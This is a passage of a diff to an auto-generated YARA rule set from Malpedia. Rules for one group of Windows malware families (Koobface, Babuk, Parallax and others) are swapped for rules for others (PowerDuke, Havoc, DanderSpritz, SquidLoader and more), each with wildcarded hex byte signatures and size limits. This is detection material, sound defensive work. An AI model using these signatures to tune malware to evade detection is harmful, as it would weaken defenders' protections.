-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.koobface_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powerduke_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "0e852ce8a28d3657fb835380a3e7fdc823e6b573b8d3e8c2631736d136315996"
+		logic_hash = "b0e443670552cebb99307ce5c81f7553239dfaab3a0b54a91654aba975b30757"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127943,32 +127876,32 @@ rule MALPEDIA_Win_Koobface_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85c8f3ffff 50 ffd6 8d85d8f3ffff 50 c645fc06 ffd6 }
-		$sequence_1 = { 56 e8???????? 59 50 56 8d8f50010000 e8???????? }
-		$sequence_2 = { 50 0fb78538c1ffff 50 ffb534c1ffff 8d85f0e8ffff ffb530c1ffff 68???????? }
-		$sequence_3 = { 6874040000 b8???????? e8???????? 8b4508 }
-		$sequence_4 = { 8bd6 c1fa05 8b1495a0534200 83e61f c1e606 f644320480 7416 }
-		$sequence_5 = { 5e 8bc3 5b 5d c20c00 e9???????? 55 }
-		$sequence_6 = { ff91b4000000 ff75d8 ffd3 8b4514 3bc7 }
-		$sequence_7 = { 50 e8???????? 68???????? 8d850857ffff 50 }
-		$sequence_8 = { 8906 3bc7 7425 6aeb 50 ff15???????? ff750c }
-		$sequence_9 = { ff11 8b45e0 c645fc02 85c0 7406 8b08 50 }
+		$sequence_0 = { 0f8401030000 8945bc 6a00 6800400000 68???????? ff75bc ff15???????? }
+		$sequence_1 = { ebea ad 89c2 81fa68747470 0f8586010000 }
+		$sequence_2 = { 681b000200 6a00 68???????? 6801000080 ff15???????? 09c0 0f8597000000 }
+		$sequence_3 = { 7518 8d85f4f7ffff 6800040000 50 ff35???????? ff15???????? 8d85f4f7ffff }
+		$sequence_4 = { 6a00 ff35???????? ff15???????? c705????????00000000 837dfc01 }
+		$sequence_5 = { 55 ff15???????? 5a 59 }
+		$sequence_6 = { c745fc01000000 eb11 c745d001000000 8b451c }
+		$sequence_7 = { 7403 41 ebf1 c6040e00 51 }
+		$sequence_8 = { 7419 a3???????? ff7514 50 ff15???????? c705????????01000000 31c0 }
+		$sequence_9 = { ff75e4 ff15???????? ff75c4 ff15???????? }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Parallax_Auto : FILE
+rule MALPEDIA_Win_Unidentified_096_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8bc5e4c5-7297-58f6-93c7-d7e053396899"
+		id = "14dc2ed1-3b02-5d6b-954c-e104f03f276c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.parallax_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_096_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "048041cd9476ccea336d154c3ff8a8cb0591d12b8f4809a446240e8afe220643"
+		logic_hash = "ce476a34a11ac04b46490ceeeb6d4b2e968299e307b980b5713cec9af31b5ce1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127982,34 +127915,34 @@ rule MALPEDIA_Win_Parallax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff96fc000000 6a04 68???????? 6a0a 68???????? e8???????? 6a04 }
-		$sequence_1 = { 837d0801 7548 8d35f4ec4000 8d3d04f14000 b908020000 f3a4 6a04 }
-		$sequence_2 = { ff7634 52 ff750c e8???????? 6a00 ff750c ff7508 }
-		$sequence_3 = { 3d02800000 7510 ff7514 ff7510 e8???????? e9???????? 3d03800000 }
-		$sequence_4 = { 5d c20c00 55 8bec 8b7d08 }
-		$sequence_5 = { 5d c20800 e8???????? 5e 662bf6 8b15???????? 3315???????? }
-		$sequence_6 = { 895f1c 8bc3 5f 5e 8be5 5d c20800 }
-		$sequence_7 = { 89463c 68ff1f0000 e8???????? 8b563c }
-		$sequence_8 = { ff751c 8f4614 ff7520 8f461c 5d c21c00 }
-		$sequence_9 = { 8b4648 8945f4 ff75f8 ff75f0 ff75f4 e8???????? eb28 }
+		$sequence_0 = { a2???????? 81e1ffff0000 5f 83c1f8 5e }
+		$sequence_1 = { 52 e8???????? 83c418 c3 8b0d???????? 51 68???????? }
+		$sequence_2 = { 55 6800000080 55 6800000080 }
+		$sequence_3 = { 68ff000000 52 ff15???????? 5f 5e 33c0 }
+		$sequence_4 = { 85c0 7505 5e 83c40c c3 6a0c }
+		$sequence_5 = { 83c03d eb3f 85ff 8ac1 7d04 }
+		$sequence_6 = { 85ff 7523 8b4c2420 8b54241c 8b442414 51 52 }
+		$sequence_7 = { b024 a2???????? eb3b b025 a2???????? }
+		$sequence_8 = { 7d04 0480 eb35 0470 eb31 }
+		$sequence_9 = { 8b400c 89410c e8???????? 83c410 56 e8???????? }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 25648
 }
-rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE
+rule MALPEDIA_Win_Synccrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32012f66-221c-5fa5-9d14-f943abc9c522"
+		id = "f82ea40e-0da6-5f75-a1e0-92f3a1e696de"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phoenix_locker_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.synccrypt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c929252a8fed8f1bda435d368708b210ebe5b5f043e324b3e033e447747795e0"
+		logic_hash = "b9e46808771b143f589c002978b4db13a073c8de6a5f0396d2ab6b76d653e5e9"
 		score = 75
-		quality = 75
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -128021,32 +127954,32 @@ rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc3 4d0fbfd0 66450fbed2 450fbfd5 4c63d3 e9???????? e9???????? }
-		$sequence_1 = { 0f8774000000 0f8530000000 488b542428 480fb7cd 488d4b14 e9???????? ff15???????? }
-		$sequence_2 = { 41b07c 6644896c2420 480fabc8 48ffc8 4180d05d 488d542420 }
-		$sequence_3 = { 4586c0 4c8bc2 f7d2 488bd1 488d0de21fe5ff e8???????? 488d0dd61fe5ff }
-		$sequence_4 = { 4184eb f9 4c03d1 4d8d1c0b f8 41f6c484 4585c9 }
-		$sequence_5 = { 688c4bd073 0f82f8aefeff 48818424100000006c322f5a 5e 5e 5e }
-		$sequence_6 = { 418b0c84 98 23cd 660fb6c6 4433c1 98 4633048b }
-		$sequence_7 = { e9???????? 0f84c0000000 418d5424ff 6641f7c2266e 4c0fa4cfaa 4c8bed }
-		$sequence_8 = { 55 d9b726ae0b68 a947d046d6 5b 21bd5e13d92f 5a 81e516495a66 }
-		$sequence_9 = { f5 f69c2418000000 5f 415e 415e 415e 5f }
+		$sequence_0 = { e9???????? 8d43d0 6683f809 0f8654010000 8d439f 6683f805 0f8653010000 }
+		$sequence_1 = { c7465800000000 893c24 c744240440000000 e8???????? 8b06 8903 8b4604 }
+		$sequence_2 = { 891c24 c744240400000000 bb01000000 e8???????? c744240c32010000 c7442408???????? c74424041e000000 }
+		$sequence_3 = { c1fa02 29c2 8d0492 01c0 29c1 85d2 0fb68181e65800 }
+		$sequence_4 = { c7442408???????? c744240426000000 c704240a000000 e8???????? 833d????????ff 0f851cfeffff eb8d }
+		$sequence_5 = { c744240878000000 c74424048e000000 c7042426000000 e8???????? 83caff e9???????? c744245caab75900 }
+		$sequence_6 = { e8???????? 893424 89c3 e8???????? 29c3 7876 39fb }
+		$sequence_7 = { c7433c00000000 c7434000000000 891c24 ff5608 85c0 7411 83c424 }
+		$sequence_8 = { 896c2404 893c24 e8???????? 893c24 e8???????? 8b442424 83c43c }
+		$sequence_9 = { c7442404???????? 893424 e8???????? 85c0 0f8ff3feffff e9???????? c7442404???????? }
 
 	condition:
-		7 of them and filesize < 3702784
+		7 of them and filesize < 4489216
 }
-rule MALPEDIA_Win_Gemcutter_Auto : FILE
+rule MALPEDIA_Win_Remsec_Strider_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2a59f86-1075-5464-b91b-cb447c183566"
+		id = "db849346-fdc8-5458-b09f-0ed961302034"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gemcutter_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remsec_strider_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9745c8061ab88116351043d55251d3e8c32737ca442027c8a6620480abc8c8bf"
+		logic_hash = "c3432e8fc924d7004cd90cb89b83a8a788a294cbc5555d3841fb9abcee97c26b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128060,32 +127993,32 @@ rule MALPEDIA_Win_Gemcutter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 889ea0314000 }
-		$sequence_1 = { 8d85f0fcffff 53 50 ffd6 8d85f0fcffff }
-		$sequence_2 = { 68???????? e8???????? 83c424 8b3d???????? 56 }
-		$sequence_3 = { 6a01 ff15???????? 6a01 68???????? e8???????? 6a01 }
-		$sequence_4 = { e8???????? 83c424 8b3d???????? 56 33f6 }
-		$sequence_5 = { 83c410 8d85f0fdffff 53 50 ffd6 8b3d???????? 8d85f0fdffff }
-		$sequence_6 = { 57 53 6801001f00 ff15???????? 3bc3 be???????? }
-		$sequence_7 = { 56 ff15???????? 8bf8 8d8500fcffff }
-		$sequence_8 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 }
-		$sequence_9 = { 6a00 6801001f00 ff15???????? 85c0 7517 68e8030000 ff15???????? }
+		$sequence_0 = { e8???????? c700???????? c74024282d8000 897828 8b481c c7412003000000 89782c }
+		$sequence_1 = { e8???????? 8bc8 6a01 8bc3 e8???????? 83c40c 83c8ff }
+		$sequence_2 = { 2345fc d3e8 0fb74de2 03c1 8b4e4c 8b0481 8bc8 }
+		$sequence_3 = { 6a04 59 83460810 8b55f4 0fb75a02 8b4608 0fb7d3 }
+		$sequence_4 = { ff4dfc 75d1 8bc6 e8???????? 8bf8 8d4701 3dffffff3f }
+		$sequence_5 = { 5e 5b c3 8b4010 80781501 750d }
+		$sequence_6 = { 8b4628 8b4e14 8bfb eb0c 8b5008 3bfa 7302 }
+		$sequence_7 = { 8bd8 8b4310 8b4844 56 3b4840 7205 e8???????? }
+		$sequence_8 = { 0f859af6ffff 8b44240c dd16 c1ef0e 8d84b80400f8ff 6a03 }
+		$sequence_9 = { e9???????? 8b06 834008f0 8b36 b8ffff0000 66014634 8bc7 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Quiterat_Auto : FILE
+rule MALPEDIA_Win_Danderspritz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "43a5ead4-80ee-505e-8349-ccdf5ab70f14"
+		id = "1b0527de-0d7b-5ad4-aabc-a511337e98f1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quiterat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danderspritz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.danderspritz_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "90260961ae1a599548c6d7cadbabe833b3a94be00dfdebc01e1cf8dc50ee7760"
+		logic_hash = "a3dc5330dc4023c2900af3ec5e9bf8ed5ecdce820fe76e6a6bb8f01cda67ce81"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128099,32 +128032,32 @@ rule MALPEDIA_Win_Quiterat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d442440 50 8d442418 50 8d442438 50 8d4c241c }
-		$sequence_1 = { 8d4dac e8???????? 8d4db0 c645fc2b e8???????? 8d45ec 50 }
-		$sequence_2 = { e8???????? 8d4c2410 51 50 8bcf e8???????? 8d4c2410 }
-		$sequence_3 = { 8d442424 57 50 e8???????? 8b8424bc020000 83c40c 8bc8 }
-		$sequence_4 = { e8???????? 6a01 68???????? 8d4c2430 e8???????? ff7004 ff30 }
-		$sequence_5 = { f00fc108 0f95c0 84c0 756e 8b44241c eb5b 837f1006 }
-		$sequence_6 = { 8b7c241c 8a4c2440 8b4360 8b5364 3b4368 7505 3b536c }
-		$sequence_7 = { 8b7c242c 8b4108 83c004 8d1481 89542418 8b410c 8d0c81 }
-		$sequence_8 = { c20800 6aff 6a00 68???????? 8d442440 b9???????? 50 }
-		$sequence_9 = { 8bf1 33db 57 c706???????? 395e50 7e2d 33ff }
+		$sequence_0 = { e8???????? 3ac3 7534 4c8b15???????? 483bfb 4d8bca 0f94c2 }
+		$sequence_1 = { 48894360 4183f802 0f877bfeffff 4183e101 488bcb 418bd1 e8???????? }
+		$sequence_2 = { 7425 85d2 7421 3bc1 721d 3bc2 7219 }
+		$sequence_3 = { 4053 4883ec30 488bd9 85d2 753d 488d9198010000 488d0d75e60100 }
+		$sequence_4 = { 83f8ff 7505 e8???????? 8b0d???????? ff15???????? 4885c0 7404 }
+		$sequence_5 = { 4c8d0d5fe60300 4c8d0560e60300 488d1555e60300 488bc8 e8???????? 83f8ff 7525 }
+		$sequence_6 = { 0fb6da 498d4be0 4533c9 448bc0 498bd2 896c2448 66896c2434 }
+		$sequence_7 = { 488bfe 4885f6 759a 8b435c 83635400 894348 }
+		$sequence_8 = { 4103fd 488b4538 8a480c 80f9ff 7403 83c708 393e }
+		$sequence_9 = { 448bc0 ba02000000 488bcf e8???????? b800000010 488b9c2408010000 4881c4c0000000 }
 
 	condition:
-		7 of them and filesize < 5892096
+		7 of them and filesize < 750592
 }
-rule MALPEDIA_Win_Catb_Auto : FILE
+rule MALPEDIA_Win_Pipemon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "933995f2-f16f-57d3-8dbf-a34d98a15a16"
+		id = "641a9fef-3a8d-534e-bfa2-dfb8a6acf672"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.catb_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pipemon_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "67c973c178a5aaefb496aaca8211cbe6cac87c68d3dfe20d86da6ecd47acde94"
+		logic_hash = "e491e9d37fd535256d0dbfcb98468cb6b5a0e8d2ca1e4782bf7c27cb6ebbc39b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128138,32 +128071,32 @@ rule MALPEDIA_Win_Catb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8491000000 498bc5 4c8d0d5d58ffff 83e03f 498bd5 }
-		$sequence_1 = { eb1f be07000000 488d15ef9e0000 448bc6 488bcf e8???????? 85c0 }
-		$sequence_2 = { 488d1db6a90300 488d3537fe0000 48895c2420 488d05aba90300 483bd8 7419 483933 }
-		$sequence_3 = { 4c8d0da47f0000 b903000000 4c8d05907f0000 488d15f9750000 e8???????? 4885c0 740f }
-		$sequence_4 = { 48895c2408 4889742410 57 4883ec20 418bf0 4c8d0d8fcf0000 }
-		$sequence_5 = { 7832 3b0d???????? 732a 4863c9 4c8d05e89f0300 488bc1 }
-		$sequence_6 = { 4c8d0d757d0000 488bd9 488d156b7d0000 b916000000 4c8d05577d0000 e8???????? 488bcb }
-		$sequence_7 = { 4c8d05117f0000 488d1592750000 e8???????? 8bcb }
-		$sequence_8 = { 488bf8 4885c0 0f8483000000 41b812000000 488d1569550100 488bc8 ff15???????? }
-		$sequence_9 = { 44895c2448 81fae9fd0000 0f8570010000 4c8d3d23aaffff 418bd3 }
+		$sequence_0 = { 57 4883ec20 488bf9 4c8d0df8c50000 b903000000 4c8d05e4c50000 }
+		$sequence_1 = { 488bec 4883ec40 488d45e8 48894de8 488945f0 488d15c0a80000 b805000000 }
+		$sequence_2 = { 488d0d620b0000 e8???????? e8???????? 488d15794a0100 488d0d524a0100 }
+		$sequence_3 = { 81f95d68fa3c 0f85a3000000 4d8b5620 41bfffff0000 }
+		$sequence_4 = { 895128 488d0d6fa90000 488b45d8 488908 }
+		$sequence_5 = { 4533ff 443b432c 723d 450fb75a06 410fb7d7 66453bfb 732b }
+		$sequence_6 = { 4c8d442458 488d4c2438 e8???????? 4c8d4820 4889442420 4c8bc3 488d5588 }
+		$sequence_7 = { 488bd8 483b5c2440 e9???????? c644243000 488d8570060000 4889442428 4c8d4c2450 }
+		$sequence_8 = { 48894a08 488d4c2420 e8???????? 488d05ce3a0100 488903 488bc3 }
+		$sequence_9 = { cc 4883ec48 488bd1 488d4c2420 e8???????? 488d15dcdc0100 }
 
 	condition:
-		7 of them and filesize < 593920
+		7 of them and filesize < 389120
 }
-rule MALPEDIA_Win_Babuk_Auto : FILE
+rule MALPEDIA_Win_Nitlove_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77f91e38-4269-56c5-a99d-eaf5692c6027"
+		id = "84765628-80ab-5981-9ee3-a789670212a2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babuk_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitlove_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "e2bb83a66a607df7c2662bebeca5bbfe5fab26f1661308e86fffacc36a5ed578"
+		logic_hash = "6dc343446a186927b9f2cf65101150f5f9c6342bdace19bd149edbf93300570a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128177,40 +128110,34 @@ rule MALPEDIA_Win_Babuk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 6800000100 e8???????? 83c404 }
-		$sequence_1 = { 50 ff15???????? 83f803 7502 }
-		$sequence_2 = { ba08000000 6bc200 8b4d08 8b540104 52 8b0401 50 }
-		$sequence_3 = { 56 57 b808000000 6bc80a 8b5508 c7040a00000000 }
-		$sequence_4 = { 3dea000000 0f85d9000000 8b55ac 52 e8???????? 83c404 }
-		$sequence_5 = { c7440a0400000000 c745fc00000000 eb09 8b45fc 83c002 8945fc }
-		$sequence_6 = { 8b85ecfdffff 8b8de4fdffff 8b948d70fdffff 89948508fdffff 8b85ecfdffff 83c001 }
-		$sequence_7 = { 8b44ca04 50 8b0cca 51 e8???????? 83c408 8945f4 }
-		$sequence_8 = { eb02 ebbe 8b4d9c 51 ff15???????? }
-		$sequence_9 = { 0f83dc000000 8b4dfc 8b5508 8b44ca04 }
-		$sequence_10 = { 8b0401 50 e8???????? 83c408 8945ec 8955f0 b908000000 }
-		$sequence_11 = { c7040100000000 c744010400000000 ba08000000 6bc200 }
-		$sequence_12 = { 894dfc 837dfc08 7d1e 8b55fc }
-		$sequence_13 = { 8985c0fdffff 83bdc0fdffff00 0f84a1000000 c785ccfdffff00000000 eb0f }
-		$sequence_14 = { ba08000000 6bc20a 8b4d08 c7040100000000 c744010400000000 }
-		$sequence_15 = { 8b8c8508fdffff 51 ff15???????? eb02 }
+		$sequence_0 = { 57 6a0b 59 be???????? 8d7dc8 f3a5 b902000080 }
+		$sequence_1 = { 03f0 c1e007 33f0 42 3bd7 7ce9 33c0 }
+		$sequence_2 = { b359 51 8d857cffffff 50 51 }
+		$sequence_3 = { 6a00 6aff ffd0 bab2bb282b 8bcb }
+		$sequence_4 = { 6aff ffd7 0fb785dcfeffff 33c9 ba1e3d0000 66898c0504feffff }
+		$sequence_5 = { ba4d8a978a 8bcb e8???????? ffd0 51 }
+		$sequence_6 = { 56 57 83ceff 33ff 8bd9 85d2 7e21 }
+		$sequence_7 = { 6a05 ffd6 833b00 747a 33db }
+		$sequence_8 = { e8???????? 8b45ec 83c43c 5f }
+		$sequence_9 = { 33f6 8b45f0 0345e4 8b4dd4 }
 
 	condition:
-		7 of them and filesize < 183296
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Rtpos_Auto : FILE
+rule MALPEDIA_Win_Squidloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "48afc2d3-0fb5-53bf-8881-dc9c81c0d9e1"
+		id = "7aae3b25-945a-5fb1-9acc-809b1e90e6e6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rtpos_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squidloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.squidloader_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "0b0f1725f7ad0b7de27494142fb6c361ef93a30e83e526a4fdbf697f28682ace"
-		score = 75
-		quality = 75
+		logic_hash = "a855ddb0a2fda3c6498fbc6ae734c571ea8f3a4a311f9d9ebae8f8d336ad0dd5"
+		score = 60
+		quality = 55
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -128222,32 +128149,32 @@ rule MALPEDIA_Win_Rtpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8b55d4 52 ff15???????? 8b45cc 50 ff15???????? }
-		$sequence_1 = { 8d8dd8fcffff 51 e8???????? 83c40c c785c4fcffff00000000 }
-		$sequence_2 = { 50 ff15???????? 8b4dcc 51 ff15???????? e9???????? 8b55ec }
-		$sequence_3 = { 8945b4 837db4ff 0f84d8010000 33c0 8945e8 8945ec }
-		$sequence_4 = { 0f84bc9f0000 ff7508 48 a3???????? }
-		$sequence_5 = { 85c0 751b 8b4dd4 51 ff15???????? }
-		$sequence_6 = { 6bf830 894df8 6a0a 8b048db86a4300 5b 8b543818 8955ec }
-		$sequence_7 = { 8b048db86a4300 f644382848 58 743a 668b55fc 663bd0 7505 }
-		$sequence_8 = { c745d800000000 837ddc00 7411 8b4ddc 51 }
-		$sequence_9 = { 6a02 8d4dfc e8???????? 8b4d08 c7410801000000 8b5108 8b049524604300 }
+		$sequence_0 = { 0f114c2440 0f114c2450 0f114c2460 0f114c2470 }
+		$sequence_1 = { 5f 5e c3 4053 4883ec30 488bd9 8b4934 }
+		$sequence_2 = { c3 4053 4883ec30 488bd9 8b4934 83e902 }
+		$sequence_3 = { 57 4881ec90000000 488b05???????? 4833c4 4889842480000000 488bda 488bf9 }
+		$sequence_4 = { 5e c3 4053 4883ec30 488bd9 8b4934 }
+		$sequence_5 = { c3 4053 4883ec30 488bd9 8b4934 83e902 746a }
+		$sequence_6 = { c3 4053 4883ec30 488bd9 8b4934 }
+		$sequence_7 = { 5e c3 4053 4883ec30 488bd9 8b4934 83e902 }
+		$sequence_8 = { ffd3 48837c242800 0f84ae000000 b8ffffffff f00fc105???????? 85c0 7f0c }
+		$sequence_9 = { e8???????? f30f108424a0010000 f30f108c24a4010000 e8???????? f20f108c2420010000 0f16d1 0fc6c000 }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 18701312
 }
-rule MALPEDIA_Win_Crypmic_Auto : FILE
+rule MALPEDIA_Win_Havoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a26f518b-f54e-5798-8fd7-c3e715fae74e"
+		id = "5b73e703-1ccd-5166-ac2d-206885cae394"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crypmic_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.havoc_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "c8a49a63b1990f5f0d77a9fcf41412b9f9f6710da574c5641db1ab5f7eadc95a"
+		logic_hash = "81f90ef0d0bf3fd238a11a66b3faf732476c67ba4c05a3cc03c8bd35850d8f8f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128261,32 +128188,32 @@ rule MALPEDIA_Win_Crypmic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 83ec10 837d0800 8bc2 894df8 0f868c000000 }
-		$sequence_1 = { 740a 8d4002 46 66833800 75f6 8d3c72 33c0 }
-		$sequence_2 = { 8d3409 33db 0fb7143e 663bda }
-		$sequence_3 = { 66833800 75f6 8d3c72 33c0 }
-		$sequence_4 = { 0fb78c15c0fdffff 663bf1 75e8 8b75f4 }
-		$sequence_5 = { 8b4e08 53 6a08 ff7604 }
-		$sequence_6 = { 8bec 81ec70020000 8b4108 53 56 }
-		$sequence_7 = { 56 57 894df4 83f828 7252 83e828 }
-		$sequence_8 = { 50 8b4608 6a08 ff7604 ffd0 8bf8 c70728000000 }
-		$sequence_9 = { bb04000000 eb27 83f808 7707 }
+		$sequence_0 = { 7512 31c0 80bc245e01000001 0f94c0 }
+		$sequence_1 = { 4489c0 4501c0 c0e807 4531cf 448a4afe }
+		$sequence_2 = { 884c2439 8a4c243a 8844243a 8a442436 884c2432 8a4c243e 8844243e }
+		$sequence_3 = { 4154 55 89cd b940000000 }
+		$sequence_4 = { 83f902 7512 31c0 80bc245e01000001 0f94c0 }
+		$sequence_5 = { 488b01 ff5018 85c0 75e2 488b0b }
+		$sequence_6 = { 4889cb 4883ec78 4885c9 7507 31c0 e9???????? 4889d1 }
+		$sequence_7 = { 4883ec20 e8???????? 488b06 488b5608 488983f0000000 488993f8000000 488d65f0 }
+		$sequence_8 = { 4989d0 31d2 4c898c2488000000 498b0424 4c8d8c2480000000 4c894c2438 4c894c2428 }
+		$sequence_9 = { 7407 488b442428 eb1b 488b06 4883c9ff }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 164864
 }
-rule MALPEDIA_Win_Flash_Develop_Auto : FILE
+rule MALPEDIA_Win_Applejeus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4688ecaa-1305-56f1-b990-d34d1967b3cd"
+		id = "c7de82bf-02e2-54ab-8e92-30ad8fa19555"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flash_develop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flash_develop_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus"
